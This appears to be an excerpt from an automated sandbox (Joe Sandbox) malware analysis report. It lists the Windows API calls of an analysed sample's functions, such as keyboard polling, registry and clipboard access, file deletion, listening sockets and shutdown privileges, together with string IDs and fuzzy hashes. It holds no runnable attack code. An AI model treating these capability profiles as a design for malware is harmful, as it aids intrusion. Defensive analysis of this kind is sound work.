                        • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0737
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EF07D6
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EF086E
                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EF0AAD
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF0ABA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                      • String ID:
                      • API String ID: 1240663315-0
                      • Opcode ID: a6582245b49e878bc11241b414c55214b7d7fd18e7a16a67fdaa1ab057f578f8
                      • Instruction ID: 72036277a0ef8db48c753dcf125a947a4f76e98566606c929300ae0f809133b6
                      • Opcode Fuzzy Hash: a6582245b49e878bc11241b414c55214b7d7fd18e7a16a67fdaa1ab057f578f8
                      • Instruction Fuzzy Hash: 1DE15D31204714AFCB14DF25C881E6ABBE9EF89714F04956DF54AEB2A2DB30ED05CB51
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00ED0241
                      • GetAsyncKeyState.USER32(000000A0), ref: 00ED02C2
                      • GetKeyState.USER32(000000A0), ref: 00ED02DD
                      • GetAsyncKeyState.USER32(000000A1), ref: 00ED02F7
                      • GetKeyState.USER32(000000A1), ref: 00ED030C
                      • GetAsyncKeyState.USER32(00000011), ref: 00ED0324
                      • GetKeyState.USER32(00000011), ref: 00ED0336
                      • GetAsyncKeyState.USER32(00000012), ref: 00ED034E
                      • GetKeyState.USER32(00000012), ref: 00ED0360
                      • GetAsyncKeyState.USER32(0000005B), ref: 00ED0378
                      • GetKeyState.USER32(0000005B), ref: 00ED038A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
                      • Instruction ID: 34ce7999c3facdd0407f252a71eb4ad840ff75369b5c063970db5c94e1a3c8ef
                      • Opcode Fuzzy Hash: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
                      • Instruction Fuzzy Hash: 9341A4245047C96EFF319AA488083B5BFA0EF52348F4C509FD5C6663C2EB949DC9C7A2
                      APIs
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • CoInitialize.OLE32 ref: 00EE8718
                      • CoUninitialize.OLE32 ref: 00EE8723
                      • CoCreateInstance.OLE32(?,00000000,00000017,00F02BEC,?), ref: 00EE8783
                      • IIDFromString.OLE32(?,?), ref: 00EE87F6
                      • VariantInit.OLEAUT32(?), ref: 00EE8890
                      • VariantClear.OLEAUT32(?), ref: 00EE88F1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 834269672-1287834457
                      • Opcode ID: 6b954ff0e8eb8c91d847508e88dd138d98e484c6ff332ba95e1cac4f84d4c147
                      • Instruction ID: 37aea6c2cbeca1a6ab41428e84657c5fefcf3be3a28f117d13160df98efd312a
                      • Opcode Fuzzy Hash: 6b954ff0e8eb8c91d847508e88dd138d98e484c6ff332ba95e1cac4f84d4c147
                      • Instruction Fuzzy Hash: F661E0706083459FD714DF26CA44B6ABBE4AF88714F50581EF989AB291CB30ED48CB92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID: 85ecfcffff506804010000ff9514ffffff8d4db8518d95ecfcffff528d85ecfcffff50ff9510ffffff6a0068800000006a036a006a0768000000808d8decfcffff$ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                      • API String ID: 0-876385396
                      • Opcode ID: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
                      • Instruction ID: 0569c3eaff9e0f531cba4e475aab4dec1a1e360505db21564b90e14ce8e9f1d0
                      • Opcode Fuzzy Hash: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
                      • Instruction Fuzzy Hash: 8CA25EB0A0421ACBDF24DF58C9507EEB7B1FB54318F14A1AAD85EB7680E7709E81DB50
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
                      • Instruction ID: 94112844c24cec14433f19918ef5ea3c4cd3c26ada0aa15d26928ee7e39eb65f
                      • Opcode Fuzzy Hash: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
                      • Instruction Fuzzy Hash: 9A2182753012149FDB109F56EC49B7A77A8EF84715F11806AF906FB2B1CB30AD05CB94
                      APIs
                        • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                        • Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ED3ADF
                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00ED3B87
                      • MoveFileW.KERNEL32(?,?), ref: 00ED3B9A
                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00ED3BB7
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED3BD9
                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00ED3BF5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                      • String ID: \*.*
                      • API String ID: 4002782344-1173974218
                      • Opcode ID: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
                      • Instruction ID: d528b76324c7088d95f082649503897dee4286b6834b9b2ea1d679c92f6427e2
                      • Opcode Fuzzy Hash: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
                      • Instruction Fuzzy Hash: 16517F318011489ADF15EBA0DD929EDB7B8EF14304F64A1ABE44A77191DF316F0ECBA1
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EDF6AB
                      • Sleep.KERNEL32(0000000A), ref: 00EDF6DB
                      • _wcscmp.LIBCMT ref: 00EDF6EF
                      • _wcscmp.LIBCMT ref: 00EDF70A
                      • FindNextFileW.KERNEL32(?,?), ref: 00EDF7A8
                      • FindClose.KERNEL32(00000000), ref: 00EDF7BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                      • String ID: *.*
                      • API String ID: 713712311-438819550
                      • Opcode ID: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
                      • Instruction ID: 5e6c6a46ba45d5c0428f3573f4543b758a090daac99113fd0e7f6149fe10827d
                      • Opcode Fuzzy Hash: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
                      • Instruction Fuzzy Hash: 3D419D7190020A9FCF10DF64CC85AEEBBB4FF05314F14556BE81AB62A0EB309E85CB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: bc115955d85169a360b30c70d4094e065ff0ac788f01dc1497d7a5ff05659841
                      • Instruction ID: 9e046514814ff454571267e6caaada4bac734d8660462e484e38e1af990d5a7e
                      • Opcode Fuzzy Hash: bc115955d85169a360b30c70d4094e065ff0ac788f01dc1497d7a5ff05659841
                      • Instruction Fuzzy Hash: FF127971A00609DBDF14DFA4DA81AEEB7F5FF48300F109569E84AB7251EB36AA11CB50
                      APIs
                        • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                        • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                      • _memmove.LIBCMT ref: 00EC062F
                      • _memmove.LIBCMT ref: 00EC0744
                      • _memmove.LIBCMT ref: 00EC07EB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID: yZ
                      • API String ID: 1300846289-3798167742
                      • Opcode ID: 3c1ce72c23ff1768220656c2422f88b85dd60d653db1ac00d7197e7bb8b0473e
                      • Instruction ID: d0f277c09646b9d93efd873380a87c6360ff857a36b686b350d922f61dd97a94
                      • Opcode Fuzzy Hash: 3c1ce72c23ff1768220656c2422f88b85dd60d653db1ac00d7197e7bb8b0473e
                      • Instruction Fuzzy Hash: 93028471A00205DFDF18DF64DA81AAE7BF5FF44300F5490A9E80AEB255EB32DA51CB91
                      APIs
                        • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                        • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                        • Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47
                      • ExitWindowsEx.USER32(?,00000000), ref: 00ED549B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $@$SeShutdownPrivilege
                      • API String ID: 2234035333-194228
                      • Opcode ID: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
                      • Instruction ID: 3b47332119272f1f43b3bebea50c3e684f708597acd0cd3140f6d98a36eb8229
                      • Opcode Fuzzy Hash: 97c25119347dbf2d16dfee693a7ac082d2b5a0a2fe43f2833caea95ec18885a3
                      • Instruction Fuzzy Hash: 9B014733654A112EF7285678EC4AFBA7258EB01356F242027FC27F22D2DA910C828192
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __itow__swprintf
                      • String ID: Oa
                      • API String ID: 674341424-3945284152
                      • Opcode ID: 1fc0f365b5dbad80bb192f10abbcb93e70e42071e77c8e09a9602dacfbd607e3
                      • Instruction ID: 9f64e8c7f2f2d6433cbf2ee6dafd5c82d943ed0071aed796d90101df441f13d5
                      • Opcode Fuzzy Hash: 1fc0f365b5dbad80bb192f10abbcb93e70e42071e77c8e09a9602dacfbd607e3
                      • Instruction Fuzzy Hash: 93228D715083019FC724EF24C891BAFB7E5AF84714F10A91DF99EA7291DB71EA04CB92
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00EE65EF
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE65FE
                      • bind.WSOCK32(00000000,?,00000010), ref: 00EE661A
                      • listen.WSOCK32(00000000,00000005), ref: 00EE6629
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6643
                      • closesocket.WSOCK32(00000000), ref: 00EE6657
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketlistensocket
                      • String ID:
                      • API String ID: 1279440585-0
                      • Opcode ID: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
                      • Instruction ID: 8330296ce7effc8085e406e371230b33112d0fda3a7cedfba9309f7c16d171b8
                      • Opcode Fuzzy Hash: a679d045020eaa12b4e838267f49c1a5192b30c54b19877768cc1e569d1c8733
                      • Instruction Fuzzy Hash: B221CC312002049FCB00AF25C889B7EB7F9EF88364F109169E91AB73D2CB30AD05CB50
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E719FA
                      • GetSysColor.USER32(0000000F), ref: 00E71A4E
                      • SetBkColor.GDI32(?,00000000), ref: 00E71A61
                        • Part of subcall function 00E71290: DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ColorProc$LongWindow
                      • String ID:
                      • API String ID: 3744519093-0
                      • Opcode ID: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
                      • Instruction ID: 9bffc5bcbe9df5f98d1ff278de3f133aa10bfa683a4c048ebb43728046be5b72
                      • Opcode Fuzzy Hash: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
                      • Instruction Fuzzy Hash: ABA16970105788BAD628AB2C6C44DBF359DDF8A359B24F15EF50AFA192DA10DD01E272
                      APIs
                        • Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6AB1
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6ADA
                      • bind.WSOCK32(00000000,?,00000010), ref: 00EE6B13
                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6B20
                      • closesocket.WSOCK32(00000000), ref: 00EE6B34
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 99427753-0
                      • Opcode ID: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
                      • Instruction ID: 5cd3399b225efbb0fae93ff0ac14b1c97ab30a6959e18818a6a51503673692f7
                      • Opcode Fuzzy Hash: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
                      • Instruction Fuzzy Hash: 0E418275640214AFEB10AB649D86F7E77E5DF84720F04D058FA1ABB3D3DA709D018B91
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
                      • Instruction ID: 014f499e43d330ddd2c0a91800ed1fef43ab8598299eb7150fbc15d2fe633f73
                      • Opcode Fuzzy Hash: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
                      • Instruction Fuzzy Hash: AC11B6323009155FD7115F26DC44B7F7798EF94721B469429E71AF7241CB309901CA95
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00EB1D88,?), ref: 00EEC312
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC324
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                      • API String ID: 2574300362-1816364905
                      • Opcode ID: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
                      • Instruction ID: f19106fdc89d47aaf0988682bfd1a8eb89f23c704f17425cc18ea9297fb8509f
                      • Opcode Fuzzy Hash: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
                      • Instruction Fuzzy Hash: 49E0C270200317CFCB304F2BD804A9676E4EF48709B90D479E895F2310E770D842CB60
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEF151
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00EEF15F
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Process32NextW.KERNEL32(00000000,?), ref: 00EEF21F
                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EEF22E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                      • String ID:
                      • API String ID: 2576544623-0
                      • Opcode ID: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
                      • Instruction ID: 69bf57b987b5f34b7f61942af1c465315cd762662c13b28b9d3162ef7b8571c5
                      • Opcode Fuzzy Hash: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
